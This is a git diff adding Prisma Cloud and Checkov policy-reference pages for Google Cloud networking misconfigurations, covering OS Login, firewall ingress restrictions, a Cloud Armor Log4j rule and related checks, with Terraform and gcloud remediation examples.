100644 index 000000000..2536a53a9 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-9.adoc @@ -0,0 +1,122 @@ +== GCP Projects have OS Login disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 01eae80a-f04f-4fe2-a5ad-00a414f89c5e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py[CKV_GCP_33] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling OSLogin ensures that SSH 
keys used to connect to instances are mapped with IAM users. +Revoking access to IAM user will revoke all the SSH keys associated with that particular user. +It facilitates centralized and automated SSH key pair management. +This is useful in handling cases such as response to compromised SSH key pairs and/or revocation of external/third-party/Vendor users. +We recommend you enable OSLogin to bind SSH certificates to IAM users and facilitates effective SSH certificate management. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/metadata [Metadata]. + +. Click * Edit*. + +. Add a metadata entry where the key is * enable-oslogin* and the value is * TRUE*. + +. To apply changes, click * Save*. + +. For every instances that overrides the project setting, go to the * VM Instances* page at https://console.cloud.google.com/compute/instances. + +. Click the name of the instance on which you want to remove the metadata value. + +. To edit the instance settings go to the top of the instance details page and click * Edit*. + +. Under * Custom metadata*, remove any entry with key * enable-oslogin* and the value is * FALSE*. + +. To apply your changes to the instance, navigate to the bottom of the instance details page and click * Save*. + + +* CLI Command* + + + +. Configure oslogin on the project using the following command: + +---- +gcloud compute project-info add-metadata --metadata enable-oslogin=TRUE +---- + +. Remove instance metadata that overrides the project setting, using the following command: + +---- +gcloud compute instances remove-metadata INSTANCE_NAME --keys=enable-oslogin +---- + +Optionally, you can enable two factor authentication for OS login. +For more information, see https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication. 
+//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_project_metadata +* *Arguments:* enable-oslogin +* *Resource:* google_compute_instance +* *Arguments:* enable-oslogin - should not override the project metadata by being set to false. + + +[source,go] +---- +//Option 1 +resource "google_compute_project_metadata" "default" { + metadata = { ++ enable-oslogin = true + } +} + +//Option 2 +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} + metadata = { +- enable-oslogin = false + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc new file mode 100644 index 000000000..8a38b90c2 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc @@ -0,0 +1,65 @@ +== GCP Cloud Armor policy not configured with cve-canary rule + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3045acbb-395c-45a0-980b-7e9e605ceaa5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py[CKV_GCP_73] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Using a vulnerable version of the Apache Log4j library can enable attackers to exploit its Lookup mechanism, which supports requests using special syntax in a format string, potentially leading to risky code execution, data leakage, and more. +Configure Cloud Armor to block this mechanism using the rule definition below. 
+Learn more about https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228] + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_security_policy + + +[source,go] +---- +resource "google_compute_security_policy" "example" { + name = "example" + + rule { + action = "deny(403)" + priority = 1 + match { + expr { + expression = "evaluatePreconfiguredExpr('cve-canary')" + } + } + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured.adoc new file mode 100644 index 000000000..7645cc95e --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-cloud-function-http-trigger-is-secured.adoc @@ -0,0 +1,66 @@ +== GCP Cloud Function HTTP trigger is not secured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4eab897c-f9a8-439d-b3d5-ac48f5d827e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml[CKV2_GCP_10] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies GCP Cloud Functions for which the HTTP trigger is not secured. +When you configure HTTP functions to be triggered only with HTTPS, user requests will be redirected to use the HTTPS protocol, which is more secure. +It is recommended to set 'Require HTTPS' when configuring HTTP triggers while deploying your function. 
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_cloudfunctions_function" "pass" { + name = "function-test" + description = "My function" + runtime = "nodejs16" + + available_memory_mb = 128 + source_archive_bucket = google_storage_bucket.bucket.name + source_archive_object = google_storage_bucket_object.archive.name + trigger_http = true + https_trigger_security_level = "SECURE_ALWAYS" + timeout = 60 + entry_point = "helloGET" + labels = { + my-label = "my-label-value" + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc new file mode 100644 index 000000000..0a9034302 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc @@ -0,0 +1,61 @@ +== GCP Firewall rule allows all traffic on MySQL DB port (3306) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1171a9b9-9648-405a-8e03-83e5025e81d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +It is a best practice to ensure that your firewall ingress rules do not allow unrestricted access to your MySQL database, as it can increase the risk of unauthorized access or attacks on your database. +By restricting access to only specific IP addresses or ranges that you trust, you can help secure your database from potential threats. 
+Additionally, you can use tools like SSL/TLS to encrypt the connection between your database and client, which can help protect against interception of sensitive data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "google_compute_firewall" "restricted" { + name = "example" + network = google_compute_network.vpc.name + + allow { + protocol = "tcp" + ports = ["3306"] + } + + + source_ranges = ["172.1.2.3/32"] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc new file mode 100644 index 000000000..e11a1b76c --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc @@ -0,0 +1,98 @@ +== GCP Firewall rule allows all traffic on MySQL DB port (3306) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1171a9b9-9648-405a-8e03-83e5025e81d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Firewall rules set up fine-grained allow/deny traffic policies to and from a virtual machine (VM). +Enabled rules are always enforced and help protect instances from unwanted traffic. +Firewall rules are defined at the network level, and only apply to the network where they are created. +While firewall rules are defined at the network level, connections are allowed or denied on a per-instance basis. 
+Additionally, it is possible to create firewall rules that allow ingress traffic from any source on the internet. +Such a firewall rule may be useful for troubleshooting but can inadvertently allow malicious or unwanted access to your instances. +One such insecure firewall rule is for MySQL databases running on TCP port 3306. +We recommend you restrict or remove the `0.0.0.0/0` MySQL firewall rule when you no longer need it. + +//// +=== Fix - Runtime + + +*GCP Console* + + +To remove your `0.0.0.0/0` MySQL firewall rule: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/networking/firewalls/list[Firewall]. + +. In the *Firewall rules in this project* section, use the *Filter* option and search for `Filter:0.0.0.0/0`. ++ +This filter returns all public firewall rules. + +. Select your public MySQL (TCP port 3306) firewall rule and then select *DELETE*. + + +*CLI Command* + + +To delete your public MySQL firewall rule, execute the following command: + +[,sh] +---- +gcloud compute firewall-rules delete FIREWALL-NAME +---- + +Replace *FIREWALL-NAME* with your target MySQL firewall rule name. 
+//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_firewall +* *Field:* source_ranges + + +[source,go] +---- +resource "google_compute_firewall" "mysql-example" { + name = "mysql-example" + network = google_compute_network.default.name + allow { + protocol = "tcp" + ports = ["3306"] + } + +- source_ranges = ["0.0.0.0/0"] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc new file mode 100644 index 000000000..8664d0ecc --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc @@ -0,0 +1,56 @@ +== GCP GCR Container Vulnerability Scanning is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0367679b-7384-4d67-9673-22e6ba99719e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml[CKV2_GCP_11] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies GCP accounts where GCR Container Vulnerability Scanning is not enabled. +GCR Container Analysis and other third-party products allow images stored in GCR to be scanned for known vulnerabilities. +Vulnerabilities in software packages can be exploited by hackers or malicious users to obtain unauthorized access to local cloud resources. +It is recommended to enable vulnerability scanning for images stored in Google Container Registry.
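+The scanning itself is provided by the Container Scanning API (`containerscanning.googleapis.com`). As a sketch only, the same API can also be enabled on its own with the per-service `google_project_service` resource rather than the aggregate `google_project_services` resource shown in the fix below; the project ID here is a placeholder. + +[source,go] +---- +resource "google_project_service" "container_scanning" { + project = "your-project-id" + service = "containerscanning.googleapis.com" +} +----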
+ +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +resource "google_project_services" "pass_1" { + project = "your-project-id" + services = ["iam.googleapis.com", "cloudresourcemanager.googleapis.com", "containerscanning.googleapis.com"] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc new file mode 100644 index 000000000..202e443d8 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc @@ -0,0 +1,60 @@ +== GCP Google compute firewall ingress allow FTP port (20) access + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f7eab932-e3bb-47aa-82d1-104f22fe1581 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py[CKV_GCP_77] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +It is a best practice to ensure that your firewall ingress rules do not allow unrestricted access to FTP port 20, as it can increase the risk of unauthorized access or attacks on your network. +FTP (File Transfer Protocol) is a widely used protocol for transferring files between computers, but it can also be a potential security risk if not properly configured. +By restricting access to only specific IP addresses or ranges that you trust, you can help secure your network from potential threats.
+ +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +resource "google_compute_firewall" "restricted" { + name = "example" + network = google_compute_network.vpc.name + + allow { + protocol = "tcp" + ports = ["20"] + } + + source_ranges = ["172.1.2.3/32"] + target_tags = ["ftp"] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc new file mode 100644 index 000000000..c23a5f54f --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc @@ -0,0 +1,61 @@ +== GCP Firewall with Inbound rule overly permissive to All Traffic + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ff6a9cca-8bc5-4a72-9235-ec7b65c547d5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml[CKV2_GCP_12] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +This policy identifies GCP Firewall rules which allow inbound traffic on all protocols from the public internet. +Doing so may allow a bad actor to brute force their way into the system and potentially get access to the entire network.
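+Rather than exposing all protocols and ports, ingress rules can be scoped to a single protocol, port, and trusted source range. A minimal sketch; the name, port, and CIDR range below are placeholders, not values taken from this policy. + +[source,go] +---- +resource "google_compute_firewall" "scoped_ingress" { + name = "scoped-ingress" + network = google_compute_network.example.name + + allow { + protocol = "tcp" + ports = ["443"] + } + + source_ranges = ["10.0.0.0/8"] +} +----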
+ +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +# pass +resource "google_compute_firewall" "compute-firewall-ok-1" { + name = "compute-firewall-ok-1" + network = google_compute_network.example.name + + deny { + protocol = "all" + } + + source_ranges = ["0.0.0.0/0"] + disabled = false +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc new file mode 100644 index 000000000..4a0129861 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc @@ -0,0 +1,62 @@ +== GCP Firewall rule allows all traffic on FTP port (21) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fab6a8ee-dc82-49f0-8c2c-a2a5c7666539 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py[CKV_GCP_75] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +FTP (File Transfer Protocol) transfers data unencrypted, and a firewall rule that opens TCP port 21 to `0.0.0.0/0` exposes the service to the entire internet. +We recommend you restrict FTP access to only the specific IP addresses or ranges that require it. + +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +# pass + +resource "google_compute_firewall" "restricted" { + name = "example" + network = google_compute_network.vpc.name + + allow { + protocol = "tcp" + ports = ["21"] + } + + source_ranges = ["172.1.2.3/32"] + target_tags = ["ftp"] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc
b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc new file mode 100644 index 000000000..ba8dba808 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc @@ -0,0 +1,62 @@ +== GCP Firewall rule allows all traffic on HTTP port (80) + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9f6d22f9-873a-4a71-91a8-41a82e4c9314 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py[CKV_GCP_106] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +We recommend you restrict access to HTTP port 80 to only the IP addresses or ranges that need it. +This can help reduce the risk of your network being accessed by unauthorized users or devices, and can also help reduce the risk of attacks such as denial of service (DoS) or distributed denial of service (DDoS) attacks.
+ +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +resource "google_compute_firewall" "restricted" { + name = "example" + network = google_compute_network.vpc.name + + allow { + protocol = "tcp" + ports = ["80"] + } + + source_ranges = ["172.1.2.3/32"] + target_tags = ["http"] +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc new file mode 100644 index 000000000..2cee3ea71 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc @@ -0,0 +1,63 @@ +== GCP VPC Network subnets have Private Google access disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ec842076-78f1-4c9c-86dc-e1c0e00f6150 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py[CKV_GCP_76] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling Private Google Access for IPv6 can help improve the security of your Google Cloud Platform (GCP) resources by allowing them to access Google APIs and services over IPv6 networks, rather than over the public internet. +This can help reduce the risk of your traffic being intercepted or tampered with, as it is routed through Google's private network. +Additionally, Private Google Access can help improve the performance and reliability of your GCP resources by reducing network latency and eliminating the need to route traffic through third-party networks.
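+At its core the setting is two subnetwork fields. A minimal sketch of a dual-stack subnetwork with both IPv4 and IPv6 private access enabled; the names and ranges are placeholders. + +[source,go] +---- +resource "google_compute_subnetwork" "private_access" { + name = "example-subnetwork" + ip_cidr_range = "10.2.0.0/16" + region = "us-central1" + network = google_compute_network.custom-test.id + stack_type = "IPV4_IPV6" + ipv6_access_type = "EXTERNAL" + private_ip_google_access = true + private_ipv6_google_access = "ENABLE_BIDIRECTIONAL_ACCESS_TO_GOOGLE" +} +----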
+ +=== Fix - Buildtime + + +*Terraform* + + +[source,go] +---- +resource "google_compute_subnetwork" "pass_bidi" { + name = "log-test-subnetwork" + ip_cidr_range = "10.2.0.0/16" + stack_type = "IPV4_IPV6" + ipv6_access_type = "EXTERNAL" + region = "us-central1" + network = google_compute_network.custom-test.id + # purpose="INTERNAL_HTTPS_LOAD_BALANCER" if set ignored + # log_config { + # metadata="EXCLUDE_ALL_METADATA" + # } + private_ip_google_access = true + private_ipv6_google_access = "ENABLE_BIDIRECTIONAL_ACCESS_TO_GOOGLE" +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project.adoc new file mode 100644 index 000000000..61b4c4064 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/ensure-legacy-networks-do-not-exist-for-a-project.adoc @@ -0,0 +1,66 @@ +== GCP project is configured with legacy network + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fa5df1d7-40d6-4629-a1a8-a7a6758d4a55 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml[CKV2_GCP_2] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +In order to prevent use of legacy networks, a project should not have a legacy network configured. +Legacy networks have a single network IPv4 prefix range and a single gateway IP address for the whole network. +The network is global in scope and spans all cloud regions. +Subnetworks cannot be created in a legacy network and are unable to switch from legacy to auto or custom subnet networks.
+Legacy networks can have an impact on high network traffic projects and are subject to a single point of contention or failure. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project +* *Resource:* google_compute_network + + +[source,go] +---- +resource "google_project" "bad_project" { + name = "My Project" + project_id = "bad" + org_id = "1234567" +} + + +resource "google_compute_network" "vpc_network_bad" { + name = "vpc-legacy" +- auto_create_subnetworks = true + project = google_project.bad_project.id +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/google-cloud-networking-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/google-cloud-networking-policies.adoc new file mode 100644 index 000000000..dfce77111 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-networking-policies/google-cloud-networking-policies.adoc @@ -0,0 +1,124 @@ +== Google Cloud Networking Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-gcp-networking-1.adoc[GCP Firewall rule allows all traffic on SSH port (22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py[CKV_GCP_2] +|HIGH + + +|xref:bc-gcp-networking-10.adoc[GCP Projects have OS Login disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py[CKV_GCP_34] +|MEDIUM + + +|xref:bc-gcp-networking-11.adoc[GCP VM instances have serial port access enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py[CKV_GCP_35] +|MEDIUM + + +|xref:bc-gcp-networking-12.adoc[GCP VM instances have IP Forwarding enabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py[CKV_GCP_36] +|MEDIUM + + +|xref:bc-gcp-networking-2.adoc[GCP Firewall rule allows all traffic on RDP port (3389)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py[CKV_GCP_3] +|HIGH + + +|xref:bc-gcp-networking-3.adoc[GCP HTTPS Load balancer is set with SSL policy having TLS version 1.1 or lower] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py[CKV_GCP_4] +|MEDIUM + + +|xref:bc-gcp-networking-4.adoc[GCP SQL database is publicly accessible] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py[CKV_GCP_11] +|HIGH + + +|xref:bc-gcp-networking-5.adoc[GCP Cloud DNS has DNSSEC disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py[CKV_GCP_16] +|MEDIUM + + +|xref:bc-gcp-networking-6.adoc[RSASHA1 is used for Zone-Signing and Key-Signing Keys in Cloud DNS DNSSEC] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py[CKV_GCP_17] +|MEDIUM + + +|xref:bc-gcp-networking-7.adoc[GCP Kubernetes Engine Clusters using the default network] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py[CKV_GCP_27] +|MEDIUM + + +|xref:bc-gcp-networking-8.adoc[GCP VM instances do have block project-wide SSH keys feature disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py[CKV_GCP_32] +|HIGH + + +|xref:bc-gcp-networking-9.adoc[GCP Projects do have OS Login disabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py[CKV_GCP_33] +|HIGH + + +|xref:ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc[GCP Cloud Armor policy not configured with cve-canary rule] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py[CKV_GCP_73] +|MEDIUM + + +|xref:ensure-gcp-cloud-function-http-trigger-is-secured.adoc[GCP Cloud Function HTTP trigger is not secured] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml[CKV2_GCP_10 ] +|MEDIUM + + +|xref:ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc[GCP Firewall rule allows all traffic on MySQL DB port (3306)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] +|LOW + + +|xref:ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc[GCP Firewall rule allows all traffic on MySQL DB port (3306)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py[CKV_GCP_88] +|LOW + + +|xref:ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc[GCP GCR Container Vulnerability Scanning is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml[CKV2_GCP_11 ] +|MEDIUM + + +|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc[GCP Google compute firewall ingress allow FTP port (20) access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py[CKV_GCP_77] +|LOW + + 
+|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc[GCP Firewall with Inbound rule overly permissive to All Traffic] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml[CKV2_GCP_12 ] +|HIGH + + +|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc[GCP Firewall rule allows all traffic on FTP port (21)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py[CKV_GCP_75] +|LOW + + +|xref:ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc[GCP Firewall rule allows all traffic on HTTP port (80)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py[CKV_GCP_106] +|LOW + + +|xref:ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc[GCP VPC Network subnets have Private Google access disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py[CKV_GCP_76] +|LOW + + +|xref:ensure-legacy-networks-do-not-exist-for-a-project.adoc[GCP project is configured with legacy network] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml[CKV2_GCP_2] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-policies.adoc new file mode 100644 index 000000000..b7d0fbc3a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-policies.adoc @@ -0,0 +1,3 @@ +== Google Cloud Policies + + diff --git 
